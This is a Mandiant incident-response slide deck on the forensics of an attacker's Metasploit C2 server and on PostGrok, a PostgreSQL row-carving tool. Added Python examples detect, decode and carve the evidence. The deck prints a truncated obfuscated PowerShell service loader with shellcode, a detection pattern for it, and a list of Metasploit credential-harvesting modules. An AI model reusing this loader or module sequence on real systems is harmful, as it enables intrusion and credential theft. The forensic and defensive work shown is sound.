© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL
Honey, I Stole Your C2 Server
A Dive Into Attacker Infrastructure

About Me
• Senior Consultant – Mandiant, a FireEye Company
• Focus on incident response
• Email: andrew.rector@mandiant.com
• Twitter: @andy_rektor

Agenda
• Summary of an enterprise investigation
• Analysis of a Command and Control (C2) server
• PostGrok: a post-mortem Python project

SUMMARY OF THE ATTACK

A Typical Mandiant Investigation
• Client calls
• Deploy technology
• Find evil, solve crime
• Eradicate the attacker
• Post-remediation monitoring
• Sayonara

This Investigation
• Standard beginning to any investigation…
  - Fortune 500 financial client contacts Mandiant
  - September 2016
  - Identified “strange” service installations…

Investigation Details
One of the "strange" service installations, as recorded in the Windows System event log (event ID 7045):
7045 | Information | A service was installed in the system. Service Name: NlCDHxYwMDHIOjtS Service File Name: %COMSPEC% /C start %COMSPEC% /C powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -C "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(“SSByZWFsbHkgaG9wZSB5b3WSdmUgbWlzc2VkIG1lIGEgbG90LiBUaG91Z2ggSSBzZWUgdGhleSBkaWRuknQgbGV0IHlvdSBmb3JnZXQgbXkgbmFt…==”)

Investigation Details
• Intelligence-led scoping
• Metasploit-based indicators
  - Non-standard workstation names
  - Service installations containing:
    • %comspec%
    • PowerShell
    • Base64 encoding
Example logon event (event ID 4624) showing an NTLM network logon from a non-standard workstation name:
4624 | Audit Success | An account was successfully logged on. <data> - Network Information: Workstation Name: QmMhuLYFzfNVblK2 Source Network Address: 10.10.10.10 Source Port: 3283 Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): NTLM V2 Key Length: 0
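The scoping indicators above as a small triage script, added here as an example (not Mandiant's tooling or anything from the talk): it flags 7045 events whose service binary is a %COMSPEC% / PowerShell / base64 chain, and 4624 NTLM logons whose workstation name looks machine-generated. The sample events are constructed from the log excerpts in the slides, and the 16-character random-name heuristic is this example's own assumption.

```python
import re

# Constructed sample events, modelled on the 7045 / 4624 entries shown in the slides (not real case data).
SAMPLE_EVENTS = [
    "7045 | Information | A service was installed in the system. Service Name: NlCDHxYwMDHIOjtS "
    "Service File Name: %COMSPEC% /C start %COMSPEC% /C powershell.exe -NoE -NoP -NonI "
    "-ExecutionPolicy Bypass -C \"sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream("
    "[IO.MemoryStream][Convert]::FromBase64String(\"SSByZWFsbHk=\")",
    "7045 | Information | A service was installed in the system. Service Name: Spooler "
    "Service File Name: C:\\Windows\\System32\\spoolsv.exe",
    "4624 | Audit Success | An account was successfully logged on. Workstation Name: QmMhuLYFzfNVblK2 "
    "Source Network Address: 10.10.10.10 Source Port: 3283 Logon Process: NtLmSsp Authentication Package: NTLM",
    "4624 | Audit Success | An account was successfully logged on. Workstation Name: FIN-WKS-0412 "
    "Source Network Address: 10.10.10.11 Source Port: 49210 Logon Process: NtLmSsp Authentication Package: NTLM",
]

# The three scoping indicators from the slides in one pattern: %comspec%, PowerShell, base64 payload.
ENCODED_SERVICE = re.compile(r"%COMSPEC%.*powershell(?:\.exe)?.*FromBase64String", re.IGNORECASE | re.DOTALL)
RANDOM_NAME = re.compile(r"[A-Za-z0-9]{16}")


def is_random_name(name):
    """Heuristic (an assumption of this example, not a rule from the talk): exactly 16 alphanumerics mixing
    upper- and lower-case, like the service and workstation names in the slides; real naming schemes rarely do."""
    return (RANDOM_NAME.fullmatch(name) is not None
            and any(c.islower() for c in name) and any(c.isupper() for c in name))


def triage_event(line):
    """Return the list of reasons one event line is suspicious (empty list if none)."""
    reasons = []
    event_id = line.split("|", 1)[0].strip()
    if event_id == "7045":
        if ENCODED_SERVICE.search(line):
            reasons.append("service binary is %COMSPEC% -> PowerShell with a base64 payload")
        m = re.search(r"Service Name:\s*(\S+)", line)
        if m and is_random_name(m.group(1)):
            reasons.append("random-looking 16-character service name")
    elif event_id == "4624":
        m = re.search(r"Workstation Name:\s*(\S+)", line)
        if m and is_random_name(m.group(1)) and "NTLM" in line:
            reasons.append("NTLM network logon from a random-looking workstation name")
    return reasons


def triage(lines):
    """Run every line through triage_event and keep only the hits as (event_id, reasons) pairs."""
    hits = []
    for line in lines:
        reasons = triage_event(line)
        if reasons:
            hits.append((line.split("|", 1)[0].strip(), reasons))
    return hits


if __name__ == "__main__":
    for event_id, reasons in triage(SAMPLE_EVENTS):
        print(event_id, "->", "; ".join(reasons))
```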

Investigation Summary
• 72 long hours later…
  - 129 systems identified
  - 116 compromised accounts
  - Initial attack vector identified

ANALYSIS OF A C2 SERVER

Two-sided Perspective
• The responder’s perspective
  - Incident response investigation
• The attacker’s perspective
  - Command and Control (C2) server

Back to That Service Installation
7045 | Information | A service was installed in the system. Service Name: NlCDHxYwMDHIOjtS Service File Name: %COMSPEC% /C start %COMSPEC% /C powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -C "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(“SSByZ…==”);IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();…

Decoding Obfuscated Code
• Identify base64 encoded data
• Identify compression scheme

Decoding Obfuscated Code
• Decode base64 encoded layer 2 function
# Layer 2, recovered by base64-decoding and decompressing the service command's payload:
# a reflection stub that looks up Win32 entry points through System.dll, followed by the
# base64-encoded byte array that holds the shellcode
function pwej6xjR {
    Param ($oID, $fP4L8tiY5H)
    $d9V = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    <snipped>
[Byte[]]$uGTfyXcU4 = [System.Convert]::FromBase64String("/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI…==")

Decoding Obfuscated Code
• Disassemble shellcode
• Identify network calls
• Convert network byte order to ASCII
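The decoding steps above carried out in Python, as an added example (not code from the talk or from PostGrok): strip the base64 plus Deflate (or Gzip) layer of the service command, pull the base64 byte array out of the layer-2 script, and scan those bytes for a sockaddr_in structure, whose port and address sit in network byte order. The sample blob, the stub bytes around the structure and the variable names are constructed for the example.

```python
import base64
import re
import socket
import struct
import zlib

# Layer 2 stores the shellcode as a second base64 literal: [Byte[]]$x = [System.Convert]::FromBase64String("...")
INNER_B64 = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)')


def decode_layer(b64_text):
    """Undo the outer layer seen in the service command: base64, then IO.Compression.DeflateStream
    (raw deflate, no zlib header) or IO.Compression.GzipStream."""
    raw = base64.b64decode(b64_text)
    try:
        return zlib.decompress(raw, -zlib.MAX_WBITS).decode("utf-8", "replace")      # DeflateStream
    except zlib.error:
        return zlib.decompress(raw, 16 + zlib.MAX_WBITS).decode("utf-8", "replace")  # GzipStream


def extract_shellcode(layer2_script):
    """Return the embedded byte array from the decoded layer-2 PowerShell, or None if there is no literal."""
    m = INNER_B64.search(layer2_script)
    return base64.b64decode(m.group(1)) if m else None


def find_sockaddr(shellcode):
    """Carve sockaddr_in candidates: AF_INET (2, host order), then port and IPv4 address in network byte
    order. Returns (ip, port) pairs; the port/address conversion is the 'network byte order to ASCII' step."""
    hits = []
    for i in range(len(shellcode) - 7):
        if shellcode[i:i + 2] != b"\x02\x00":
            continue
        (port,) = struct.unpack("!H", shellcode[i + 2:i + 4])
        ip = socket.inet_ntoa(shellcode[i + 4:i + 8])
        if port and not ip.startswith("0."):        # drop obvious junk matches
            hits.append((ip, port))
    return hits


def analyse(outer_b64):
    """Full pipeline: service-command base64 blob -> layer 2 -> shellcode -> connect-back address(es)."""
    script = decode_layer(outer_b64)
    shellcode = extract_shellcode(script)
    return find_sockaddr(shellcode) if shellcode else []


# --- constructed sample, not the case's real payload ---------------------------------------
def build_sample(ip, port, gzip=False):
    """Layer a blob the way the service command does: sockaddr_in inside filler bytes, base64,
    then Deflate or Gzip, then base64 again."""
    filler = (b"\x90" * 16 + struct.pack("<H", 2) + struct.pack("!H", port)
              + socket.inet_aton(ip) + b"\xcc" * 8)
    layer2 = ("function pwej6xjR {\n  Param ($oID, $fP4L8tiY5H)\n}\n"
              "[Byte[]]$uGTfyXcU4 = [System.Convert]::FromBase64String(\"%s\")\n"
              % base64.b64encode(filler).decode())
    wbits = 16 + zlib.MAX_WBITS if gzip else -zlib.MAX_WBITS
    comp = zlib.compressobj(9, zlib.DEFLATED, wbits)
    return base64.b64encode(comp.compress(layer2.encode()) + comp.flush()).decode()


if __name__ == "__main__":
    print(analyse(build_sample("192.0.2.10", 4444)))    # [('192.0.2.10', 4444)]
```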

Provide Decoded IP to Client
• Provide decoded IP to client
(Figure: C2 IP address)

A Familiar IP
• Client recognizes IP owner
• Described as a “small time competitor”

Client Asks For C2 Server

Client Receives Entire Server

Mandiant Images Server
Forensic Analysis
 Windows Server 2008
- Attacker created their own user account
- Privilege escalation and credential harvesting
- Best of all…
• Downloaded VMWare Workstation
• Downloaded Kali Linux ISO
• Installed Kali VM – July 2016
• Two months before attack starts

Forensic Analysis
• Investigation inception
  - Focus on Kali
  - Export VM
  - Rinse, wash, repeat

Forensic Analysis
• Kali VM
  - Valuable secure logs
  - Meterpreter configuration file
  - SQLMap – detecting and exploiting SQL flaws
  - BeEF – The Browser Exploitation Framework
  - Revealing keyword searches
  - PostgreSQL history contained some interesting data:
    createuser msf -P -S -R -D
    createdb -O msf msf
    exit
    dropdb msf
    dropuser msf
    dropdb ms_test
    dropuser msf
    createuser msf -P -S -R -D
    createdb -O msf msf
    exit
    dropdb
    dropdb msf
    createdb msf
    exit

Metasploit and PostgreSQL
• PostgreSQL command history tells a story
• PostgreSQL is messy
  - /var/lib/postgresql/<version>/main/base
  - Collection of binary files
  - Publicly available parser doesn’t exist

Boot Up
• It’s a VM… what if we just boot up the VM and access the DB directly?
  - Password protected
  - Single user mode
  - Change PW
  - Profit

I AM THE ATTACKER
(Figure: “Got System” – impersonate attacker)

Metasploit… For IR?
• Leverage PostgreSQL history to obtain critical DB info
• Leverage MSFConsole to interact with the PostgreSQL DB

Metasploit DB Commands
Command    Function
creds      List all credentials in the database
hosts      List all hosts in the database
loot       Information gained from post-exploitation modules
notes      Information from reconnaissance and network enumeration
services   Services running on identified hosts
vulns      Vulnerabilities identified, and exploitation status

PostgreSQL Shenanigans
• Good… but not great
  - Not everything had timestamps
  - Wanted even more detail
• Directly accessing the DB and bypassing Metasploit is the better way to go
  - DB via psql: psql -U msf -h localhost
  - And…

SO MANY TABLES!

Metasploit Credential Publics

Metasploit Credential Realms

Sessions
Sessions Decoded
..{$".WORKSPACEI"..:.EF".VERBOSEI" true.;.F"
USERNAME".Ultra<REDACTED>"
PASSWORD".<REDACTED>".USER_FILEI"..;.F".PASS_FILEI"..;.F".USERPASS_FILEI"..;.F".B
RUTEFORCE_SPEEDI".5.;.F".BLANK_PASSWORDSI"
false.;.F".USER_AS_PASSI"
false.;.F".DB_ALL_CREDSI"
false.;.F".DB_ALL_USERSI"
false.;.F".DB_ALL_PASSI"
false.;.F".STOP_ON_SUCCESSI"
false.;.F".REMOVE_USER_FILEI"
false.;.F".REMOVE_PASS_FILEI"
false.;.F".REMOVE_USERPASS_FILEI"
false.;.F".MaxGuessesPerServiceI".0.;.F".MaxMinutesPerServiceI".0.;.F".MaxGuesses
PerUserI".0.;.F".InitialAutoRunScript".".AutoRunScript".".RHOSTS".<company.domain
.com>".THREADSI".50.;.F".ShowProgressI"
true.;.F".ShowProgressPercentI".10.;.FI"
RPORT.;.FI".22.;.FI".Proxies.;.FI"..;.F".SSH_DEBUGI"
false.;.F".SSH_TIMEOUTI".30.;.F"
RHOSTI".<Remote IP Address>.;.F

Case Solved
• A complete timeline
• A perspective from two sides:
  - The investigator
  - The attacker!
• Happy client, happy consultant

POSTGROK: A POST-MORTEM PYTHON PROJECT

Identifying Additional Victims
• BUT WAIT…
  - Attacker had access to the C2 server since July 2016
  - PostgreSQL history contained evidence of prior DBs
  - Is there any way to recover deleted DBs?

Identifying Additional Victims
• At least three deleted PostgreSQL databases
  - Data verified via keyword searches
• Has anyone ever tried to recover PostgreSQL databases?
  - Research didn’t identify anything obvious
  - One project that was a work in progress, but not as much focus on PostgreSQL

Identifying Additional Victims
• Python hobbyist
  - PostgreSQL is open source
  - Went on a journey to read C
  - Created PostGrok to carve all PostgreSQL rows from a flat binary file (raw image)

Down the PostgreSQL Rabbit Hole

PostgreSQL Terms and Definitions
• Anatomy of a PostgreSQL DB
  - Tables
  - Page (page header)
  - Row pointers
  - Free space
  - Row entry

A PostgreSQL Page
Color legend for the page diagram:
Color    Meaning
Red      Table header
Blue     Row pointers
Yellow   Null space
Purple   Row data

PostgreSQL Page Header
• Table header
  - 24 byte structure
  - Version info
  - # of rows = (pd_lower – 24)/24
(Figure labels: Version, PD_Lower)

PostgreSQL Row Pointers
• Row pointers
  - Four byte structures
  - Contain the offset and size of the row

PostgreSQL Page Free Space
• Free space
  - New row pointers are added from the start of free space
  - New row data is added to the end

PostgreSQL Row
• Row entry
  - 24 byte header
  - Row data
(Figure label: Row Header)

PostgreSQL Row Header
• Row header
  - Row insertion ID
  - Row deletion ID
  - Number of attributes
  - Offset of row data
(Figure labels: Deletion ID, Insertion ID, # of Attributes, Row data offset)

Row Data
• Row data
  - Integers
  - Dates and times
  - Variable length strings
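The page anatomy from the last few slides (24-byte page header with pd_lower/pd_upper, four-byte row pointers growing down from the header, row data growing up from the end, 24-byte row header with insertion ID, deletion ID, attribute count and data offset) as a minimal carver in Python. This is an added example, not PostGrok's code: it walks a raw image in 8 KB steps, keeps only chunks whose header passes sanity checks, and returns every row, flagging rows whose deletion ID is set but whose bytes are still on the page. The (int4, text) schema, the field names and the sample image are this example's assumptions, built with the same layout rules it parses.

```python
import struct

PAGE_SIZE = 8192             # default BLCKSZ
PAGE_HEADER_LEN = 24         # sizeof(PageHeaderData)
TUPLE_HEADER_LEN = 24        # HeapTupleHeaderData with no null bitmap (t_hoff == 24)
LP_NORMAL = 1                # ItemIdData lp_flags value for a live row pointer
HEAP_XMAX_INVALID = 0x0800   # t_infomask bit: the stored xmax is not a valid deleting transaction
# pd_lsn, pd_checksum, pd_flags, pd_lower, pd_upper, pd_special, pd_pagesize_version, pd_prune_xid
PAGE_HDR_FMT = "<QHHHHHHI"
# t_xmin, t_xmax, t_cid, t_ctid.blkid, t_ctid.posid, t_infomask2, t_infomask, t_hoff
TUPLE_HDR_FMT = "<IIIIHHHB"

def parse_page_header(page):
    """The 24-byte page header; pd_pagesize_version packs page size (high byte) and layout version (low byte)."""
    _lsn, _csum, _flags, lower, upper, _special, size_ver, _prune = struct.unpack_from(PAGE_HDR_FMT, page, 0)
    return {"pd_lower": lower, "pd_upper": upper,
            "page_size": size_ver & 0xFF00, "layout_version": size_ver & 0x00FF}

def looks_like_page(buf):
    """Carving sanity check: 8 KB page, layout version 4 (PostgreSQL 8.3 onwards, incl. 9.5), header <= lower <= upper."""
    if len(buf) < PAGE_SIZE:
        return False
    h = parse_page_header(buf)
    return (h["page_size"] == PAGE_SIZE and h["layout_version"] == 4
            and PAGE_HEADER_LEN <= h["pd_lower"] <= h["pd_upper"] <= PAGE_SIZE)

def line_pointers(page):
    """One 4-byte ItemIdData per row between byte 24 and pd_lower: 15-bit offset, 2 flag bits, 15-bit length."""
    h = parse_page_header(page)
    ptrs = []
    for i in range((h["pd_lower"] - PAGE_HEADER_LEN) // 4):
        (word,) = struct.unpack_from("<I", page, PAGE_HEADER_LEN + 4 * i)
        ptrs.append({"off": word & 0x7FFF, "flags": (word >> 15) & 0x3, "len": (word >> 17) & 0x7FFF})
    return ptrs

def decode_int4_text(data):
    """Assumed sample schema (int4, text). A short varlena's 1-byte header holds (total_len << 1) | 1;
    a 4-byte header holds total_len << 2. Both lengths include the header itself."""
    (num,) = struct.unpack_from("<i", data, 0)
    if data[4] & 0x01:
        text = data[5:4 + (data[4] >> 1)]
    else:
        (word,) = struct.unpack_from("<I", data, 4)
        text = data[8:4 + (word >> 2)]
    return num, text.decode("utf-8", "replace")

def parse_row(page, ptr):
    """Read the 24-byte row header. A non-zero deletion ID (xmax) that is not flagged invalid marks a
    deleted row whose bytes are still on the page, which is what makes post-mortem carving useful."""
    off = ptr["off"]
    xmin, xmax, _cid, _blk, _pos, infomask2, infomask, hoff = struct.unpack_from(TUPLE_HDR_FMT, page, off)
    return {"xmin": xmin, "xmax": xmax, "natts": infomask2 & 0x07FF,
            "deleted": xmax != 0 and not infomask & HEAP_XMAX_INVALID,
            "values": decode_int4_text(page[off + hoff:off + ptr["len"]])}

def carve_rows(image):
    """Walk a raw image in 8 KB steps and return every row of every chunk that passes the page checks."""
    rows = []
    for base in range(0, len(image) - PAGE_SIZE + 1, PAGE_SIZE):
        page = image[base:base + PAGE_SIZE]
        if not looks_like_page(page):
            continue
        upper = parse_page_header(page)["pd_upper"]
        for ptr in line_pointers(page):
            if ptr["len"] >= TUPLE_HEADER_LEN and ptr["off"] >= upper:
                rows.append(parse_row(page, ptr))
    return rows

# --- constructed sample image (not data from the case) ---------------------------------------
def build_tuple(xmin, xmax, num, text):
    enc = text.encode()
    body = struct.pack("<i", num) + bytes([((len(enc) + 1) << 1) | 0x01]) + enc   # int4 + short varlena
    infomask = 0x0002 | (0 if xmax else HEAP_XMAX_INVALID)                         # HEAP_HASVARWIDTH (+ live)
    hdr = struct.pack(TUPLE_HDR_FMT, xmin, xmax, 0, 0, 1, 2, infomask, TUPLE_HEADER_LEN)
    return hdr.ljust(TUPLE_HEADER_LEN, b"\x00") + body

def build_page(tuples):
    """Pointers grow down from the header and row data grows up from the end, as the free-space slide says."""
    page = bytearray(PAGE_SIZE)
    lower, upper = PAGE_HEADER_LEN, PAGE_SIZE
    for t in tuples:
        upper -= (len(t) + 7) // 8 * 8                                   # tuples are MAXALIGN'd (8 bytes)
        page[upper:upper + len(t)] = t
        struct.pack_into("<I", page, lower, upper | (LP_NORMAL << 15) | (len(t) << 17))
        lower += 4
    struct.pack_into(PAGE_HDR_FMT, page, 0, 0, 0, 0, lower, upper, PAGE_SIZE, PAGE_SIZE | 4, 0)
    return bytes(page)

SAMPLE_IMAGE = bytes(PAGE_SIZE) + build_page([          # a zero page first, then one well-formed page
    build_tuple(700, 0, 1, "msf"),
    build_tuple(701, 955, 2, "ms_test"),                 # xmax set: dropped, but the bytes remain
    build_tuple(702, 0, 3, "msf"),
])

if __name__ == "__main__":
    for row in carve_rows(SAMPLE_IMAGE):
        print(row)
```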

PostGrok Capabilities
• PostGrok
  - A Python tool that thoroughly understands PostgreSQL
• Capabilities:
  - Carve PostgreSQL rows from a flat, binary file
  - Keyword searching
  - Exports to CSV or XLSX
  - Officially supports version 9.5

https://github.com/arector327/PostGrok

PostGrok Findings
• PostGrok helped identify:
  - Full Meterpreter sessions from campaigns occurring in:
    • July 2016
    • August 2016
    • September 2016
  - 1,428 compromised credentials
  - 48 enumerated domains

Top Post-Exploitation Modules
Module                                                     Frequency   Function
run post/windows/gather/credentials/sso                    81          Extracts SSO credentials
run post/windows/gather/enum_ad_computers                  26          Enumerates systems in the default AD directory
run post/windows/gather/enum_domains                       24          Enumerates domains a host has visibility into
run post/windows/gather/smart_hashdump                     14          Dumps local accounts from the SAM database
run post/multi/gather/filezilla_client_cred                11          Collects credentials from the FileZilla FTP client
run post/windows/gather/credentials/gpp                    8           Gathers GPP XML files and extracts passwords
run post/windows/gather/credentials/credential_collector   7           Extracts credentials from the host
run post/windows/gather/credentials/outlook                4           Extracts and decrypts Outlook passwords from the Windows Registry
run post/windows/gather/credentials/tortoisesvn            4           Extracts and decrypts saved TortoiseSVN passwords

Attacker Creates User Accounts
Attacker creates user account “mava2” on victim system

Attacker Uploaded Webshells
Attacker uploads “ntdaddy.php” and “cmd.php” to victim web server

Attacker Data Theft
Attacker downloads file “wifi_pass.xlsx” from victim workstation
Attacker views contents of “FileZilla.txt” and downloads “23.7.2016.xls”

Attacker Tradecraft
Attacker executes PsExec, creates reverse shell using NetCat

Attacker Tradecraft (cont.)
Attacker attempts to unzip the archive “file.zip”, is unsuccessful and downloads a DLL from another compromised web server

Summary
• Mandiant investigated an intrusion conducted by an unknown attacker
• Obtained a C2 server, and performed forensic analysis
• Developed a tool to carve PostgreSQL rows from an image

Takeaways
• Metasploit gets the job done
• Operational security
• Just ask

QUESTIONS?

Shakacon
 
Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir   incident response in a containerized, immutable, continually deploy...Dock ir   incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...
Shakacon
 
Reviewing the Security of ASoC Drivers in Android Kernel
Reviewing the Security of ASoC Drivers in Android KernelReviewing the Security of ASoC Drivers in Android Kernel
Reviewing the Security of ASoC Drivers in Android Kernel
Shakacon
 
Silent Protest: A Wearable Protest Network
Silent Protest:  A Wearable Protest NetworkSilent Protest:  A Wearable Protest Network
Silent Protest: A Wearable Protest Network
Shakacon
 
WiFi-Based IMSI Catcher
WiFi-Based IMSI CatcherWiFi-Based IMSI Catcher
WiFi-Based IMSI Catcher
Shakacon
 
Sad Panda Analysts: Devolving Malware
Sad Panda Analysts:  Devolving MalwareSad Panda Analysts:  Devolving Malware
Sad Panda Analysts: Devolving Malware
Shakacon
 
reductio [ad absurdum]
reductio [ad absurdum]reductio [ad absurdum]
reductio [ad absurdum]
Shakacon
 
XFLTReat: a new dimension in tunnelling
XFLTReat:  a new dimension in tunnellingXFLTReat:  a new dimension in tunnelling
XFLTReat: a new dimension in tunnelling
Shakacon
 
Windows Systems & Code Signing Protection by Paul Rascagneres
Windows Systems & Code Signing Protection by Paul RascagneresWindows Systems & Code Signing Protection by Paul Rascagneres
Windows Systems & Code Signing Protection by Paul Rascagneres
Shakacon
 
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
Shakacon
 
The Search for the Perfect Door - Deviant Ollam
The Search for the Perfect Door - Deviant OllamThe Search for the Perfect Door - Deviant Ollam
The Search for the Perfect Door - Deviant Ollam
Shakacon
 
Swift Reversing by Ryan Stortz
Swift Reversing by Ryan StortzSwift Reversing by Ryan Stortz
Swift Reversing by Ryan Stortz
Shakacon
 
Making a Scalable Automated Hacking System by Artem Dinaburg
Making a Scalable Automated Hacking System by Artem DinaburgMaking a Scalable Automated Hacking System by Artem Dinaburg
Making a Scalable Automated Hacking System by Artem Dinaburg
Shakacon
 

More from Shakacon (20)

Web (dis)assembly
Web (dis)assemblyWeb (dis)assembly
Web (dis)assembly
 
Macdoored
MacdooredMacdoored
Macdoored
 
I can be apple and so can you
I can be apple and so can youI can be apple and so can you
I can be apple and so can you
 
Cloud forensics putting the bits back together
Cloud forensics putting the bits back togetherCloud forensics putting the bits back together
Cloud forensics putting the bits back together
 
Pwned in Translation - from Subtitles to RCE
Pwned in Translation - from Subtitles to RCEPwned in Translation - from Subtitles to RCE
Pwned in Translation - from Subtitles to RCE
 
Oversight: Exposing spies on macOS
Oversight: Exposing spies on macOS Oversight: Exposing spies on macOS
Oversight: Exposing spies on macOS
 
Modern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layerModern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layer
 
A Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts BytecodeA Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts Bytecode
 
Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir   incident response in a containerized, immutable, continually deploy...Dock ir   incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...
 
Reviewing the Security of ASoC Drivers in Android Kernel
Reviewing the Security of ASoC Drivers in Android KernelReviewing the Security of ASoC Drivers in Android Kernel
Reviewing the Security of ASoC Drivers in Android Kernel
 
Silent Protest: A Wearable Protest Network
Silent Protest:  A Wearable Protest NetworkSilent Protest:  A Wearable Protest Network
Silent Protest: A Wearable Protest Network
 
WiFi-Based IMSI Catcher
WiFi-Based IMSI CatcherWiFi-Based IMSI Catcher
WiFi-Based IMSI Catcher
 
Sad Panda Analysts: Devolving Malware
Sad Panda Analysts:  Devolving MalwareSad Panda Analysts:  Devolving Malware
Sad Panda Analysts: Devolving Malware
 
reductio [ad absurdum]
reductio [ad absurdum]reductio [ad absurdum]
reductio [ad absurdum]
 
XFLTReat: a new dimension in tunnelling
XFLTReat:  a new dimension in tunnellingXFLTReat:  a new dimension in tunnelling
XFLTReat: a new dimension in tunnelling
 
Windows Systems & Code Signing Protection by Paul Rascagneres
Windows Systems & Code Signing Protection by Paul RascagneresWindows Systems & Code Signing Protection by Paul Rascagneres
Windows Systems & Code Signing Protection by Paul Rascagneres
 
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
 
The Search for the Perfect Door - Deviant Ollam
The Search for the Perfect Door - Deviant OllamThe Search for the Perfect Door - Deviant Ollam
The Search for the Perfect Door - Deviant Ollam
 
Swift Reversing by Ryan Stortz
Swift Reversing by Ryan StortzSwift Reversing by Ryan Stortz
Swift Reversing by Ryan Stortz
 
Making a Scalable Automated Hacking System by Artem Dinaburg
Making a Scalable Automated Hacking System by Artem DinaburgMaking a Scalable Automated Hacking System by Artem Dinaburg
Making a Scalable Automated Hacking System by Artem Dinaburg
 

Recently uploaded

Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
Pixlogix Infotech
 
Project Management Semester Long Project - Acuity
Project Management Semester Long Project - AcuityProject Management Semester Long Project - Acuity
Project Management Semester Long Project - Acuity
jpupo2018
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
innovationoecd
 
June Patch Tuesday
June Patch TuesdayJune Patch Tuesday
June Patch Tuesday
Ivanti
 
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdfMonitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Tosin Akinosho
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
Brandon Minnick, MBA
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
Mariano Tinti
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
shyamraj55
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
panagenda
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
Zilliz
 
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc
 
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptxNordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
MichaelKnudsen27
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
Zilliz
 
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxOcean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
SitimaJohn
 
Skybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoptionSkybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoption
Tatiana Kojar
 
